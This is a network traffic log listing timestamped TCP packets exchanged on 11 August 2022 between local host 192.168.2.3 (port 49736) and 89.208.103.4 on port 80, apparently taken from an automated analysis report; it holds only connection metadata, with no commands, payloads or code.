Aug 11, 2022 06:57:08.882308006 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.882338047 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.882345915 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.882385969 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.882795095 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.882844925 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.882868052 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.882882118 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.883007050 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.883014917 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.884938955 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.884980917 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.884996891 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.885019064 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.885029078 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.885056019 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.885072947 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.885093927 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.885097980 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.885130882 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.885142088 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.885169029 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.885189056 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.885206938 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.885210991 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.885257006 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.885412931 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.885449886 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.885462046 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.885488033 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.885498047 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.885526896 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.885534048 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.885576963 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.886470079 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.886512041 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.886532068 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.886547089 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:08.886574030 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:08.886601925 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.164251089 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.217720032 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.217745066 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.217763901 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.217781067 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.217789888 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.217798948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.217817068 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.217817068 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.217832088 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.217871904 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.217895985 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.230789900 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.230809927 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.230825901 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.230844021 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.230860949 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.230878115 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.230890989 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.230928898 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.232400894 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.232419014 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.232435942 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.232454062 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.232471943 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.232486010 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.232487917 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.232506037 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.232506037 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.232525110 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.232542992 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.232543945 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.232561111 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.232561111 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.232579947 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.232593060 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.232597113 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.232609987 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.232614994 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.232633114 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.232646942 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.232650042 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.232667923 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.232672930 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.232685089 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.232706070 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.232736111 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.242240906 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.242259979 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.242332935 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.242834091 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.243283987 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.248028040 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.248049021 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.248063087 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.248078108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.248092890 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.248107910 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.248125076 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.248413086 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.250806093 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.250855923 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.250894070 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.250912905 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.250931025 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.250946045 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.250969887 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.250981092 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.251008034 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.251044989 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.251077890 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.251081944 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.251113892 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.251120090 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.251137018 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.251157045 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.251195908 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.251233101 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.251271009 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.251308918 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.251369953 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.251419067 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.251447916 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.251456976 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.251482010 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.251494884 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.251508951 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.251533031 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.251575947 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.251593113 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.251616001 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.251653910 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.251678944 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.251692057 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.251729012 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.251751900 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.251765966 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.251775026 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.251804113 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.251842022 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.251861095 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.251880884 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.251914024 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.251938105 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.251971006 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.255996943 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.256061077 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.256115913 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.256159067 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.256165981 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.256202936 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.256217003 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.256237984 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.256268978 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.256326914 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.257499933 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.257658958 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.257721901 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.257769108 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.257783890 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.257785082 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.257842064 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.257893085 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.257905006 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.257941008 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.258057117 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.261710882 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.261766911 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.261821032 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.261854887 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.261871099 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.261879921 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.261924028 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.261935949 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.261975050 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.262020111 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.262034893 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.262069941 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.262078047 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.262129068 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.262254953 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.262307882 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.262317896 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.262502909 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.262506962 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.262552977 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.262568951 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.262603998 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.262614012 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.262655020 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.262705088 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.262718916 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.262756109 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.262806892 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.262815952 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.262856960 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.262911081 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.262952089 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.262959957 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.263010025 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.263017893 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.263060093 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.263119936 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.263124943 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.263176918 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.263225079 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.263237000 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.263274908 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.263333082 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.263808012 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.263861895 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.263914108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.263926029 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.263962030 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.264013052 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.264023066 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.264062881 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.264103889 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.264122963 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.264153957 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.264204025 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.264213085 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.264254093 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.264305115 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.264313936 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.264813900 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.264868021 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.264883995 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.264919043 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.264967918 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.264980078 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.265908003 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.265960932 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.265980959 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.266011000 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.266060114 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.266074896 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.266107082 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.266165018 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.271637917 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.271697998 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.271753073 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.271795034 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.271804094 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.271820068 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.271855116 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.271864891 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.271905899 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.271914959 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.271956921 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.271966934 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.272006989 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.272068024 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.272140026 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.272195101 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.272314072 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.272381067 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.272437096 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.272478104 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.272490978 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.273300886 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.273350000 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.273415089 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.274821043 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.274836063 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.274897099 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.275299072 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.275340080 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.275398016 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.275425911 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.275465012 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.275500059 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.275530100 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.275537014 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.275568008 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.275578976 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.275603056 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.275615931 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.275671005 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.275784016 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.276297092 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.276875019 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.276917934 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.276948929 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.276957989 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.276985884 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.276995897 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.277004957 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.277035952 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.277072906 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.277095079 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.277107954 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.277146101 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.277160883 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.277183056 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.277190924 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.277220964 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.277260065 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.277277946 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.277297020 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.277333975 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.277354956 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.277370930 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.277381897 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.277407885 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.277465105 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.279498100 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.279539108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.279577971 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.279602051 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.279613972 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.279639006 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.279653072 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.279690027 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.279715061 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.279727936 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.279766083 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.279779911 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.279818058 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.279830933 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.279856920 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.279911995 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.280039072 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.280122995 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.280162096 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.280185938 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.280199051 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.280204058 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.280236006 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.280273914 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.280297995 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.280311108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.280349016 CEST	80	49736	89.208.103.4	192.168.2.3
